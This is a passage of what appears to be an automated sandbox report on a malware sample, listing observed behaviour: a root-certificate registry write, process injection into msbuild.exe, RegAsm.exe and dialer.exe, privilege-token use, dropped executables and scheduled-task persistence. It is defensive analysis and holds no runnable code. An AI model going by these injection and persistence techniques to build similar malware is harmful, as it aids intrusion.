d7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e C:\Users\Admin\Pictures\b04vaIYl7t9GKnLT4gGKsr1W.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 5c000000010000000400000000100000190000000100000010000000ffac207997bb2cfe865570179ee037b90f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703080b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac89988140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f1d0000000100000010000000a86dc6a233eb339610f3ed414927c559030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e404000000010000001000000078f2fcaa601f2fb4ebc937ba532e75492000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e C:\Users\Admin\Pictures\b04vaIYl7t9GKnLT4gGKsr1W.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\u2zg.0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\u2zg.0.exe N/A
N/A N/A C:\Users\Admin\Pictures\D5DiMuAoMYdqs3uIyHVh2vxp.exe N/A
N/A N/A C:\Users\Admin\Pictures\D5DiMuAoMYdqs3uIyHVh2vxp.exe N/A
N/A N/A C:\Users\Admin\Pictures\D5DiMuAoMYdqs3uIyHVh2vxp.exe N/A
N/A N/A C:\Users\Admin\Pictures\D5DiMuAoMYdqs3uIyHVh2vxp.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
N/A N/A C:\Windows\SysWOW64\dialer.exe N/A
N/A N/A C:\Windows\SysWOW64\dialer.exe N/A
N/A N/A C:\Windows\SysWOW64\dialer.exe N/A
N/A N/A C:\Windows\SysWOW64\dialer.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\Pictures\wwBOAPkgANJgdWjG6GOEj92T.exe N/A
N/A N/A C:\Users\Admin\Pictures\RW0Wiuz2PCYu43eGZVwdlZGN.exe N/A
N/A N/A C:\Users\Admin\Pictures\RW0Wiuz2PCYu43eGZVwdlZGN.exe N/A
N/A N/A C:\Users\Admin\Pictures\wwBOAPkgANJgdWjG6GOEj92T.exe N/A
N/A N/A C:\Users\Admin\Pictures\fYmZfMjQZC7bcgTgxzU4okLP.exe N/A
N/A N/A C:\Users\Admin\Pictures\fYmZfMjQZC7bcgTgxzU4okLP.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\u2zg.0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\u2zg.0.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\Pictures\fYmZfMjQZC7bcgTgxzU4okLP.exe N/A
N/A N/A C:\Users\Admin\Pictures\fYmZfMjQZC7bcgTgxzU4okLP.exe N/A
N/A N/A C:\Users\Admin\Pictures\fYmZfMjQZC7bcgTgxzU4okLP.exe N/A
N/A N/A C:\Users\Admin\Pictures\fYmZfMjQZC7bcgTgxzU4okLP.exe N/A
N/A N/A C:\Users\Admin\Pictures\fYmZfMjQZC7bcgTgxzU4okLP.exe N/A
N/A N/A C:\Users\Admin\Pictures\fYmZfMjQZC7bcgTgxzU4okLP.exe N/A
N/A N/A C:\Users\Admin\Pictures\fYmZfMjQZC7bcgTgxzU4okLP.exe N/A
N/A N/A C:\Users\Admin\Pictures\fYmZfMjQZC7bcgTgxzU4okLP.exe N/A
N/A N/A C:\Users\Admin\Pictures\fYmZfMjQZC7bcgTgxzU4okLP.exe N/A
N/A N/A C:\Users\Admin\Pictures\fYmZfMjQZC7bcgTgxzU4okLP.exe N/A
N/A N/A C:\Users\Admin\Pictures\RW0Wiuz2PCYu43eGZVwdlZGN.exe N/A
N/A N/A C:\Users\Admin\Pictures\RW0Wiuz2PCYu43eGZVwdlZGN.exe N/A
N/A N/A C:\Users\Admin\Pictures\wwBOAPkgANJgdWjG6GOEj92T.exe N/A
N/A N/A C:\Users\Admin\Pictures\wwBOAPkgANJgdWjG6GOEj92T.exe N/A
N/A N/A C:\Users\Admin\Pictures\RW0Wiuz2PCYu43eGZVwdlZGN.exe N/A
N/A N/A C:\Users\Admin\Pictures\RW0Wiuz2PCYu43eGZVwdlZGN.exe N/A
N/A N/A C:\Users\Admin\Pictures\wwBOAPkgANJgdWjG6GOEj92T.exe N/A
N/A N/A C:\Users\Admin\Pictures\wwBOAPkgANJgdWjG6GOEj92T.exe N/A
N/A N/A C:\Users\Admin\Pictures\RW0Wiuz2PCYu43eGZVwdlZGN.exe N/A
N/A N/A C:\Users\Admin\Pictures\RW0Wiuz2PCYu43eGZVwdlZGN.exe N/A
N/A N/A C:\Users\Admin\Pictures\RW0Wiuz2PCYu43eGZVwdlZGN.exe N/A
N/A N/A C:\Users\Admin\Pictures\RW0Wiuz2PCYu43eGZVwdlZGN.exe N/A
N/A N/A C:\Users\Admin\Pictures\RW0Wiuz2PCYu43eGZVwdlZGN.exe N/A
N/A N/A C:\Users\Admin\Pictures\RW0Wiuz2PCYu43eGZVwdlZGN.exe N/A
N/A N/A C:\Users\Admin\Pictures\wwBOAPkgANJgdWjG6GOEj92T.exe N/A
N/A N/A C:\Users\Admin\Pictures\wwBOAPkgANJgdWjG6GOEj92T.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Pictures\RW0Wiuz2PCYu43eGZVwdlZGN.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Pictures\wwBOAPkgANJgdWjG6GOEj92T.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\Pictures\wwBOAPkgANJgdWjG6GOEj92T.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\Pictures\RW0Wiuz2PCYu43eGZVwdlZGN.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Pictures\fYmZfMjQZC7bcgTgxzU4okLP.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\Pictures\fYmZfMjQZC7bcgTgxzU4okLP.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\rss\csrss.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\sc.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\sc.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\u2zg.1.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4932 wrote to memory of 576 N/A C:\Users\Admin\AppData\Local\Temp\8c2daeab0a4f1cf937c65a17fffe6f50a33d102c5ab4638e2438211cfefe544d.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
PID 4932 wrote to memory of 576 N/A C:\Users\Admin\AppData\Local\Temp\8c2daeab0a4f1cf937c65a17fffe6f50a33d102c5ab4638e2438211cfefe544d.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
PID 4932 wrote to memory of 576 N/A C:\Users\Admin\AppData\Local\Temp\8c2daeab0a4f1cf937c65a17fffe6f50a33d102c5ab4638e2438211cfefe544d.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
PID 4932 wrote to memory of 576 N/A C:\Users\Admin\AppData\Local\Temp\8c2daeab0a4f1cf937c65a17fffe6f50a33d102c5ab4638e2438211cfefe544d.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
PID 4932 wrote to memory of 576 N/A C:\Users\Admin\AppData\Local\Temp\8c2daeab0a4f1cf937c65a17fffe6f50a33d102c5ab4638e2438211cfefe544d.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
PID 4932 wrote to memory of 576 N/A C:\Users\Admin\AppData\Local\Temp\8c2daeab0a4f1cf937c65a17fffe6f50a33d102c5ab4638e2438211cfefe544d.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
PID 4932 wrote to memory of 576 N/A C:\Users\Admin\AppData\Local\Temp\8c2daeab0a4f1cf937c65a17fffe6f50a33d102c5ab4638e2438211cfefe544d.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
PID 4932 wrote to memory of 576 N/A C:\Users\Admin\AppData\Local\Temp\8c2daeab0a4f1cf937c65a17fffe6f50a33d102c5ab4638e2438211cfefe544d.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
PID 4932 wrote to memory of 1972 N/A C:\Users\Admin\AppData\Local\Temp\8c2daeab0a4f1cf937c65a17fffe6f50a33d102c5ab4638e2438211cfefe544d.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
PID 4932 wrote to memory of 1972 N/A C:\Users\Admin\AppData\Local\Temp\8c2daeab0a4f1cf937c65a17fffe6f50a33d102c5ab4638e2438211cfefe544d.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
PID 4932 wrote to memory of 1972 N/A C:\Users\Admin\AppData\Local\Temp\8c2daeab0a4f1cf937c65a17fffe6f50a33d102c5ab4638e2438211cfefe544d.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
PID 576 wrote to memory of 3868 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Users\Admin\Pictures\YTL0PmmS83SCp78qfDgfizjt.exe
PID 576 wrote to memory of 3868 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Users\Admin\Pictures\YTL0PmmS83SCp78qfDgfizjt.exe
PID 576 wrote to memory of 3868 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Users\Admin\Pictures\YTL0PmmS83SCp78qfDgfizjt.exe
PID 576 wrote to memory of 1164 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Users\Admin\Pictures\fYmZfMjQZC7bcgTgxzU4okLP.exe
PID 576 wrote to memory of 1164 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Users\Admin\Pictures\fYmZfMjQZC7bcgTgxzU4okLP.exe
PID 576 wrote to memory of 1164 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Users\Admin\Pictures\fYmZfMjQZC7bcgTgxzU4okLP.exe
PID 576 wrote to memory of 4996 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Windows\SysWOW64\forfiles.exe
PID 576 wrote to memory of 4996 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Windows\SysWOW64\forfiles.exe
PID 576 wrote to memory of 4996 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Windows\SysWOW64\forfiles.exe
PID 576 wrote to memory of 3156 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Users\Admin\Pictures\MQRy5a2TwXi0WZTzeI0qoVpB.exe
PID 576 wrote to memory of 3156 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Users\Admin\Pictures\MQRy5a2TwXi0WZTzeI0qoVpB.exe
PID 576 wrote to memory of 3156 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Users\Admin\Pictures\MQRy5a2TwXi0WZTzeI0qoVpB.exe
PID 576 wrote to memory of 4568 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Users\Admin\Pictures\RW0Wiuz2PCYu43eGZVwdlZGN.exe
PID 576 wrote to memory of 4568 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Users\Admin\Pictures\RW0Wiuz2PCYu43eGZVwdlZGN.exe
PID 576 wrote to memory of 4568 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Users\Admin\Pictures\RW0Wiuz2PCYu43eGZVwdlZGN.exe
PID 576 wrote to memory of 3752 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Users\Admin\Pictures\D5DiMuAoMYdqs3uIyHVh2vxp.exe
PID 576 wrote to memory of 3752 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Users\Admin\Pictures\D5DiMuAoMYdqs3uIyHVh2vxp.exe
PID 576 wrote to memory of 3752 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Users\Admin\Pictures\D5DiMuAoMYdqs3uIyHVh2vxp.exe
PID 3156 wrote to memory of 3940 N/A C:\Users\Admin\Pictures\MQRy5a2TwXi0WZTzeI0qoVpB.exe C:\Windows\System32\Conhost.exe
PID 3156 wrote to memory of 3940 N/A C:\Users\Admin\Pictures\MQRy5a2TwXi0WZTzeI0qoVpB.exe C:\Windows\System32\Conhost.exe
PID 3156 wrote to memory of 3940 N/A C:\Users\Admin\Pictures\MQRy5a2TwXi0WZTzeI0qoVpB.exe C:\Windows\System32\Conhost.exe
PID 3156 wrote to memory of 3208 N/A C:\Users\Admin\Pictures\MQRy5a2TwXi0WZTzeI0qoVpB.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3156 wrote to memory of 3208 N/A C:\Users\Admin\Pictures\MQRy5a2TwXi0WZTzeI0qoVpB.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3156 wrote to memory of 3208 N/A C:\Users\Admin\Pictures\MQRy5a2TwXi0WZTzeI0qoVpB.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3156 wrote to memory of 3208 N/A C:\Users\Admin\Pictures\MQRy5a2TwXi0WZTzeI0qoVpB.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3156 wrote to memory of 3208 N/A C:\Users\Admin\Pictures\MQRy5a2TwXi0WZTzeI0qoVpB.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3156 wrote to memory of 3208 N/A C:\Users\Admin\Pictures\MQRy5a2TwXi0WZTzeI0qoVpB.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3156 wrote to memory of 3208 N/A C:\Users\Admin\Pictures\MQRy5a2TwXi0WZTzeI0qoVpB.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3156 wrote to memory of 3208 N/A C:\Users\Admin\Pictures\MQRy5a2TwXi0WZTzeI0qoVpB.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3156 wrote to memory of 3208 N/A C:\Users\Admin\Pictures\MQRy5a2TwXi0WZTzeI0qoVpB.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3156 wrote to memory of 3208 N/A C:\Users\Admin\Pictures\MQRy5a2TwXi0WZTzeI0qoVpB.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3156 wrote to memory of 3208 N/A C:\Users\Admin\Pictures\MQRy5a2TwXi0WZTzeI0qoVpB.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3868 wrote to memory of 1308 N/A C:\Users\Admin\Pictures\YTL0PmmS83SCp78qfDgfizjt.exe C:\Windows\system32\cmd.exe
PID 3868 wrote to memory of 1308 N/A C:\Users\Admin\Pictures\YTL0PmmS83SCp78qfDgfizjt.exe C:\Windows\system32\cmd.exe
PID 3868 wrote to memory of 1308 N/A C:\Users\Admin\Pictures\YTL0PmmS83SCp78qfDgfizjt.exe C:\Windows\system32\cmd.exe
PID 3868 wrote to memory of 3396 N/A C:\Users\Admin\Pictures\YTL0PmmS83SCp78qfDgfizjt.exe C:\Users\Admin\AppData\Local\Temp\u2zg.1.exe
PID 3868 wrote to memory of 3396 N/A C:\Users\Admin\Pictures\YTL0PmmS83SCp78qfDgfizjt.exe C:\Users\Admin\AppData\Local\Temp\u2zg.1.exe
PID 3868 wrote to memory of 3396 N/A C:\Users\Admin\Pictures\YTL0PmmS83SCp78qfDgfizjt.exe C:\Users\Admin\AppData\Local\Temp\u2zg.1.exe
PID 576 wrote to memory of 3460 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Users\Admin\Pictures\b04vaIYl7t9GKnLT4gGKsr1W.exe
PID 576 wrote to memory of 3460 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Users\Admin\Pictures\b04vaIYl7t9GKnLT4gGKsr1W.exe
PID 576 wrote to memory of 3460 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Users\Admin\Pictures\b04vaIYl7t9GKnLT4gGKsr1W.exe
PID 3208 wrote to memory of 2380 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\SysWOW64\dialer.exe
PID 3208 wrote to memory of 2380 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\SysWOW64\dialer.exe
PID 3208 wrote to memory of 2380 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\SysWOW64\dialer.exe
PID 3208 wrote to memory of 2380 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\SysWOW64\dialer.exe
PID 3208 wrote to memory of 2380 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\SysWOW64\dialer.exe
PID 3460 wrote to memory of 1808 N/A C:\Users\Admin\Pictures\b04vaIYl7t9GKnLT4gGKsr1W.exe C:\Users\Admin\Pictures\b04vaIYl7t9GKnLT4gGKsr1W.exe
PID 3460 wrote to memory of 1808 N/A C:\Users\Admin\Pictures\b04vaIYl7t9GKnLT4gGKsr1W.exe C:\Users\Admin\Pictures\b04vaIYl7t9GKnLT4gGKsr1W.exe
PID 3460 wrote to memory of 1808 N/A C:\Users\Admin\Pictures\b04vaIYl7t9GKnLT4gGKsr1W.exe C:\Users\Admin\Pictures\b04vaIYl7t9GKnLT4gGKsr1W.exe
PID 3460 wrote to memory of 4412 N/A C:\Users\Admin\Pictures\b04vaIYl7t9GKnLT4gGKsr1W.exe C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\b04vaIYl7t9GKnLT4gGKsr1W.exe
PID 3460 wrote to memory of 4412 N/A C:\Users\Admin\Pictures\b04vaIYl7t9GKnLT4gGKsr1W.exe C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\b04vaIYl7t9GKnLT4gGKsr1W.exe
PID 3460 wrote to memory of 4412 N/A C:\Users\Admin\Pictures\b04vaIYl7t9GKnLT4gGKsr1W.exe C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\b04vaIYl7t9GKnLT4gGKsr1W.exe
PID 3460 wrote to memory of 2892 N/A C:\Users\Admin\Pictures\b04vaIYl7t9GKnLT4gGKsr1W.exe C:\Users\Admin\Pictures\b04vaIYl7t9GKnLT4gGKsr1W.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\system32\sihost.exe

sihost.exe

C:\Users\Admin\AppData\Local\Temp\8c2daeab0a4f1cf937c65a17fffe6f50a33d102c5ab4638e2438211cfefe544d.exe

"C:\Users\Admin\AppData\Local\Temp\8c2daeab0a4f1cf937c65a17fffe6f50a33d102c5ab4638e2438211cfefe544d.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"

C:\Users\Admin\Pictures\YTL0PmmS83SCp78qfDgfizjt.exe

"C:\Users\Admin\Pictures\YTL0PmmS83SCp78qfDgfizjt.exe"

C:\Users\Admin\Pictures\fYmZfMjQZC7bcgTgxzU4okLP.exe

"C:\Users\Admin\Pictures\fYmZfMjQZC7bcgTgxzU4okLP.exe"

C:\Users\Admin\Pictures\wwBOAPkgANJgdWjG6GOEj92T.exe

"C:\Users\Admin\Pictures\wwBOAPkgANJgdWjG6GOEj92T.exe"

C:\Users\Admin\Pictures\MQRy5a2TwXi0WZTzeI0qoVpB.exe

"C:\Users\Admin\Pictures\MQRy5a2TwXi0WZTzeI0qoVpB.exe"

C:\Users\Admin\Pictures\RW0Wiuz2PCYu43eGZVwdlZGN.exe

"C:\Users\Admin\Pictures\RW0Wiuz2PCYu43eGZVwdlZGN.exe"

